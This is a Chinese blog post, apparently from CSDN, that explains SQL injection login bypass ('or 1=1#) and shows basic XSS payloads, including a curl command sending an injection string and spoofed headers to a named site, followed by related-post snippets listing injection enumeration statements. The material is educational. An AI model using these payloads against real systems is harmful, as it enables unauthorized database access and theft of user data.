sql注入、xss语句测试

已于 2022-09-19 15:20:45 修改
阅读量776 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: http请求攻击模拟 文章标签: sql 数据库 database
于 2022-02-17 14:41:01 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixing100200/article/details/122983073
本文探讨了SQL注入和XSS跨站脚本攻击的原理。通过示例,展示了如何利用‘or1=1#’进行SQL注入,绕过登录验证,获取数据库中的所有用户信息。同时,也演示了XSS攻击的不同形式,如利用头信息和URL注入恶意脚本,提醒读者关注网络安全,防范此类攻击。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

d:\Users\Administrator\Desktop\curl-7.80.0-win64-mingw\bin>curl.exe -Iv http://www.bj2342.cn/?id=1'or'1'='1 -H "X-Forwarded-For:1.1.1.1" -H "X-Forwarded-For:2.2.2.2"

select * from users where username=’’ or 1=1#’ and password=balabala

我们分析下语义,在SQL语法中 # 是注释符,所以后面的语句都会杯注释掉,那么上面的语句就等价于

select * from users where username=’’ or 1=1

我们知道SQL语句中where相当于判断语句,并且是由 or 连接的,所以 username=’’ 和 1=1 中有一个为真就为真。1=1肯定为真,所以语句又等价于

select * from users

这个语句的作用是爆出表中的所有字段。

也就是说我们用 ‘or 1=1# 这么一个字符串就可以绕开登陆的密码,直接进入程序。当然这仅限于那些可以被注入的程序或者网页噢
————————————————

XSS模拟

d:\Users\Administrator\Desktop\curl-7.80.0-win64-mingw\bin>curl -iH "XSS: <svg onload=alert(1)>" http://xxx.xxx.com

http://www.example.com/<script>alert('hello');</script>

http://www.example.com/x=<script>alert(1)</script>

java的SQL注入XSS攻击
私聊前往站内信:https://i.csdn.net/#/msg/chat/weixin_44976692
01-15 2万+
通过了解和防范SQL注入XSS攻击,我们能够提高Java应用的安全性,保护用户的信息免受威胁。大家好,欢迎来到本文!在Java开发中,安全问题一直备受关注,其中SQL注入XSS攻击是两个常见的安全隐患。是一种攻击手段,通过在应用的用户输入中注入恶意的SQL代码,从而篡改、查询或者删除数据库中的数据。攻击者通过构造精巧的输入,使应用误认为这些输入是合法的SQL语句。**XSS攻击(跨站脚本攻击)**则是通过在Web页面中注入恶意脚本,使用户在浏览器上执行这些脚本,从而盗取用户信息或者执行一些恶意操作。
Java 安全:如何防止 SQL 注入XSS 攻击?
shrgegrb的博客
04-22 1116
SQL 注入是一种利用应用程序对用户输入缺乏有效过滤,将恶意 SQL 代码插入到查询语句中,从而对数据库进行未授权访问或操作的攻击方式。如果攻击者在用户名或密码输入框中输入类似的内容,就会改变原 SQL 语句的逻辑,导致查询结果不准确,甚至可能泄露用户信息。在 Java 开发中,防止 SQL 注入XSS 攻击是保障应用程序安全的重要环节。通过使用预编译语句、输入验证等方法可以有效防止 SQL 注入;采用输出编码、严格的输入验证等策略可以抵御 XSS 攻击。
软件测试sql注入·依赖基本sql语句
m0_57290404的博客
12-23 1318
目的:回顾数据库查询条件语句(手工sql注入操作基础知识)语句:1. 查询所有字段:select * from users;2. 查询指定字段:3. 条件查询:4. 逻辑与:5. 逻辑或:select * from users where user=‘adminn’ or user_id= 5;联合UNION语句练习 2问题:执行失败,提示:使用SELECT语句有不同的列解决:使用数字代替列,猜测前面表查询寻列数。
sql注入之(登录框绕过)
热门推荐
qq_42383069的博客
05-06 2万+
sql注入之(登录框绕过) 原理说明: Mysql数据库查询语句: 一般的登录框sql语句如下: select name.passwd from users where username=‘name’ and password=‘pwd’; 分析: 如果我们输入的是正确的用户名与密码,肯定就可以登陆进去,错的就不行了。但是这个验证机制可以通过SQL语句来构造一个特殊的“字符串”通过验证。 比如我们...
如何检测和处理SQL注入
最新发布
深山技术宅的博客
06-11 968
SQL注入检测与防护全面指南》摘要:SQL注入是Web应用重大安全威胁,攻击者通过输入恶意SQL代码操控数据库。检测方法包括手工测试(特殊字符观察响应)、自动化工具(SQLMap、OWASP ZAP)和日志分析。防护措施推荐:①参数化查询(最有效);②存储过程;③输入验证(白名单、类型转换);④最小权限原则;⑤安全框架(Laravel、Symfony);⑥WAF应用。动态表名需结合白名单验证,错误处理应记录日志但不显示细节。多层防御策略包括输入验证→预处理→权限控制→WAF→审计→入侵检测。最佳实践强调参
测试常用SQL注入语句大全
weixin_30627341的博客
04-21 254
转载自Cracer,标题:《渗透常用SQL注入语句大全》,链接http://www.xxxx.com/?p=2226 1.判断有无注入点 整形参数判断 1、直接加' 2、and 1=1 3、 and 1=2 如果1、3运行异常 2正常就存在注入字符型判断 1、直接加' 2、and '1'='1' 3、 and '1'='2'搜索型: 关键字%' and ...
2024版最新148款CTF工具整理大全(附下载安装包)含基础环境、Web 安全、加密解密、密码爆破、文件、隐写、逆向、PWN等全套工具
Libra1313的博客
10-23 1万+
经常会有大学生粉丝朋友私信大白,想通过打CTF比赛镀金,作为进入一线互联网大厂的门票。但是在CTF做题很多的时候都会用到工具,所以在全网苦寻CTF比赛工具安装包!
SQL注入语句-手工测试
dee2306的博客
06-28 648
准备工作:先把IE菜单=>工具=>Internet选项=>高级=>显示友好 HTTP 错误信息前面的勾去掉。否则,不论服务器返回什么错误,IE都只显示为HTTP 500服务器错误,不能获得更多的提示信息。 数字型:and 1=1 and 1=2 判断是否存在注入字符型:' and '1'='1 ' and '1'='2搜索型: 关键字%' and 1=1 and...
XSSsql注入部分场景测试用例样例
m0_37570494的博客
09-07 1012
XSS 攻击通常是通过输入字段插入恶意的 JavaScript 代码,试图执行客户端脚本。设计这些测试用例时,需要涵盖常见的 XSS 攻击手段。SQL 注入攻击通常通过在输入字段中插入恶意 SQL 代码,试图操纵数据库查询。设计这些测试用例时,需要涵盖各种常见的 SQL 注入技术。
XSSSQL注入
weixin_51909453的博客
12-15 1359
XSSSQL注入 1.实验目的 实验目的:了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法;了解SQL注入的基本原理;掌握PHP脚本访问MySQL数据库的基本方法;掌握程序设计中避免出现SQL注入漏洞的基本方法;掌握网站配置。 系统环境:Kali Linux 2、Windows Server 网络环境:交换网络结构 实验工具: Beef;AWVS(Acunetix Web Vulnarability Scanner);SqlMAP;DVWA 2.实验过程 实验步骤: XSS部分:利用Beef
安全测试SQL注入XSS攻击
wenroudong的博客
11-05 4407
SQL注入原理: 注入攻击的本质:把用户输入的数据当做代码执行。 两个必要的条件:一是用户可以控制输入;二是原本要执行的代码拼接了用户的输入数据。 1、任何可以与数据库交互的编程语言都可能出现SQL注入漏洞。 2、SQL注入能够让攻击者对服务器进行任意的文件读取,危害巨大。 修复建议: 1、普通用户与系统管理员用户的权限要有严格的区分 数据库应该使用最小权限原则,例如普通用户不允许去查询系统表、调用loadlife函数等;即使终端用户使用SQL语句中带有嵌入式的恶意代码,由于其用户权限的限制,
SQL注入语句大全-.判断有无注入
04-21
1.判断有无注入点 ; and 1=1 and 1=2 2.猜表一般的表的名称无非是admin adminuser user pass password 等.. and 0(select count(*) from *) and 0(select count(*) from admin) ---判断是否存在admin这张表 3.猜帐号数目 如果遇到0< 返回正确页面 1<返回错误页面说明帐号数目就是1个 and 0<(select count(*) from admin) and 1<(select count(*) from admin) 4.猜解字段名称 在len( ) 括号里面加上我们想到的字段名称
绕过登录的万能密码 SQL 注入
杳若的博客
08-15 442
绕过登录的万能密码 SQL 注入
软件测试mysql注入语句_SQL注入语句 (很全)
weixin_29758911的博客
01-27 887
1、返回的是连接的数据库名and db_name()>02、作用是获取连接用户名and user>03、将数据库备份到Web目录下面;backup database 数据库名 to disk='c:\inetpub\wwwroot\1.db';--4、显示SQL系统版本and 1=(select @@VERSION) 或and 1=convert(int,@@version)--5、判...
SQL注入绕过登陆界面
weixin_73094474的博客
03-06 3314
【代码】SQL注入绕过登陆界面。
渗透测试-SQL注入
weixin_53696027的博客
02-05 2864
sql注入是渗透测试重要的一部分,如果服务器存在sql注入漏洞将面临严重的威胁
sql注入
qq_49714982的博客
04-06 4408
高版本:在MYSQL5.0以上版本存在一个自带数据库为information_schema,它是一个存储所有数据库名、表名、列名的数据库,相当于可以通过查询它获取指定数据库下面的表名、列名信息。id=1 and 1=2 union select 1,database(),user(),4)union select 1,2,3,4(几个列就写到几,并且让?id=1报错,比如id=-1或者 and 1=2)id=-1 union select 1,group_concat(数据项1),3,4 from。
SQL注入 | 黑客入门篇(如何绕过密码登陆账号)
weixin_44328211的博客
05-23 9448
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar
SQL注入漏洞测试(登录绕过)
Jz031212的博客
07-23 172
1'or 1=1 # 就可以登录成功。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值